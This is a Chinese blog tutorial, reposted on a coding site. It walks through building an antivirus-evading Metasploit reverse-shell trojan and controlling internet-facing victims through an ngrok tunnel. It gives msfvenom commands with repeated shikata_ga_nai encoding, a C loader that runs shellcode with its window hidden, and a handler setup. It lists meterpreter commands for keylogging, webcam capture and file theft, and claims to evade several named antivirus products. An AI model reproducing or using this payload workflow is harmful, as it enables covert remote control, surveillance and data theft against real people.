Metasploit实验:制作免杀payload+对任意“外网”主机的远控

栏目: 编程工具 · 发布时间: 6年前

内容简介:Metasploit实验:制作免杀payload+对任意“外网”主机的远控

*本文只做技术交流之用,技术无罪,希望大家知法懂法,更要守法

我发一个文件,你电脑就被我控制了,我可以拍照摄像下载文件,杀毒软件也不管用!这是怎么做到的呢?

这个问题的实现需要拆分成下面三个模块

内网穿透到外网

制作免杀木马后门

Metasploit控制客户机

环境准备

操作系统 用途 IP地址 需要软件
Kali 制作payload,攻击,映射端口 192.168.1.130 Metasploit Ngrok
Win7 制作payload 省略 VC++6.0
Win10 客户机 任意公网地址

内网穿透到外网

首先我们需要下载一个用于内网穿透的 工具 来进行端口映射与转发。

这里我用的是 linux 64bit

https://www.ngrok.cc/#down-client

接下来在上面的网站自行注册申请,然后登陆。

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

然后申请免费隧道,选择TCP协议,自定义远程端口,本地IP地址就是kali的IP地址,端口自定义,但不要冲突。

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

这里请记住隧道id,以及自定义远程端口,kali本机端口

将下载的客户端放置于指定目录,cd到目录,在命令行运行ngrok

./sunny clientid 隧道id

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

这样就完成了端口映射,它能将外网端口接收到的数据返回到本机kali的指定端口。内网穿透的用途很多,下面给出说明,这里不再赘述。

https://ngrok.com/docs

制作免杀木马后门

首先,在kali中用msfvenom生成一个payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=server.ngrok.cc lport=11206 -f c

上面命令中,-p选择指定payload,–e选择制定编码器(不同编码器免杀效果也有不同,部分编码器应对火绒等杀软效果显著), -i 编码次数,-b 去多余/坏字符,lhost是你申请的ngrok服务器地址 lport是自定义的远程端口,-f 生成指定格式。

我这里选择生成基于 C语言 的数组,当然你也可以用以下命令直接得到exe木马,但这样免杀效果会打折扣,经笔者测试多次,重复编码12次后免杀效果非常强大!

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=server.ngrok.cc lport=11206 -f exe > haya.exe

然后复制buf数组

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

在win7下用VC6.0对下面代码进行编译,得到木马。

#include <stdio.h>
#pragmacomment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//运行时不显示窗口
unsignedchar buf[] =
"buf数组";//将复制的数组粘贴到此处
main()
{
((void(*)(void))&buf)();
}

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

Metasploit控制客户机

切到Kali,使用Metasploit进行监听。

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

设置监听攻击模块,监听载荷,IP(kali本机),端口(ngrok里自定义的本地端口),然后exp。

use exploit/multi/handler
set payloadswindows/meterpreter/reverset_tcp
set lhost 192.168.1.130
set lport 12345
exploit

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

当客户机执行木马后,得到一个meterpreter,可以进行的操作你懂的哈哈。

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

list一些meterpreter的常用命令。

Download(upload) path 下载(上传)指定目录文件
ps 列出当前系统进程
Kill uid 消灭指定uid系统进程
keyscan_start 开始键盘记录软件
webcam_snap 拍照
截屏 screenshot

关于隐藏木马,加陌生壳,自启动,文件包含,进程转移等各种姿势加强木马强度就需要大家自行测试了

通入上述步骤得到的木马经过笔者测试可以通过 360,腾讯管家,Windows defender,小红伞 等杀毒软件的查杀。动态免杀中,对于 360 ,如果exe没有放在C盘或者U盘运行就可以做到动态免杀,仅仅会在拍照等特敏感操作会有提示,其他操作全程不报毒, defender腾讯管家 就更弱了,拍照也不会有任何提示。

Metasploit实验:制作免杀payload+对任意“外网”主机的远控 Metasploit实验:制作免杀payload+对任意“外网”主机的远控


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

两周自制脚本语言

两周自制脚本语言

[日]千叶 滋 / 陈筱烟 / 人民邮电出版社 / 2014-6 / 59.00元

《两周自制脚本语言》是一本优秀的编译原理入门读物。全书穿插了大量轻松风趣的对话,读者可以随书中的人物一起从最简单的语言解释器开始,逐步添加新功能,最终完成一个支持函数、数组、对象等高级功能的语言编译器。本书与众不同的实现方式不仅大幅简化了语言处理器的复杂度,还有助于拓展读者的视野。 《两周自制脚本语言》适合对编译原理及语言处理器设计有兴趣的读者以及正在学习相关课程的大中专院校学生。同时,已经......一起来看看 《两周自制脚本语言》 这本书的介绍吧!

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具